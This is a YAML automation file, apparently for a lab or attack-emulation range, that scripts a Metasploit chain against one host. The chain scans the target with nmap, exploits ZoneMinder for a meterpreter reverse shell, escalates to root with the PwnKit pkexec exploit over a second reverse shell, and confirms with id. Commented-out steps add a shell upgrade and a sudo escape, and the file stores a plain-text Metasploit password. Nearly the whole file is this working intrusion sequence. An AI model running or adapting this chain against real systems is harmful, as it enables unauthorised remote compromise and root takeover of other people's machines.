###
msf_config:
  password: hackhelfer
  server: 10.18.3.86

vars:
  $SERVER_ADDRESS: 192.42.0.254

commands:
  - type: shell
    cmd: nmap $SERVER_ADDRESS
    error_if: .*test.*

  - type: msf-module
    cmd: exploit/unix/webapp/zoneminder_snapshots
    creates_session: "foothold"
    options:
      RHOSTS: 192.42.0.254
    payload_options:
      LHOST: 192.42.2.253
    payload: cmd/unix/python/meterpreter/reverse_tcp

      #  - type: sleep
      #    seconds: 60
  - type: msf-module
    cmd: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
    session: "foothold"
    creates_session: "root"
    options:
      WRITABLE_DIR: "/tmp"
    payload_options:
      LHOST: 192.42.2.253
      LPORT: 4455
    payload: linux/x64/shell/reverse_tcp

      #   - type: sleep
      #     seconds: 60

      #  - type: msf-session
      #    stdapi: True
      #    cmd: sysinfo
      #
      #  - type: msf-session
      #    stdapi: True
      #    cmd: getuid
      #
      #  - type: msf-session
      #    cmd: shell

  - type: msf-session
    stdapi: True
    session: "foothold"
    cmd: getuid

  - type: msf-session
    session: "root"
    write: True
    cmd: id

  - type: msf-session
    session: "root"
    read: True
    cmd: id


      #  - type: msf-session
      #    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
      #
      #  - type: msf-session
      #    cmd: export SHELL=bash
      #
      #  - type: msf-session
      #    cmd: export TERM=xterm256-color
      #
      #  - type: msf-session
      #    cmd: stty rows 38 columns 116
      #
      #  - type: msf-session
      #    cmd: sudo -l
      #
      #  - type: msf-session
      #    write: True
      #    cmd: "sudo dmesg -H"
      #
      #  - type: msf-session
      #    write: True
      #    cmd: "!/bin/bash\r\n"
      #
      #  - type: msf-session
      #    cmd: id
      #
      #  - type: msf-session
      #    cmd: ls -l /root
      #
      #  - type: msf-session
      #    cmd: exit

  - type: msf-module
    cmd: auxiliary/scanner/portscan/tcp
    options:
      RHOSTS: 192.42.0.254
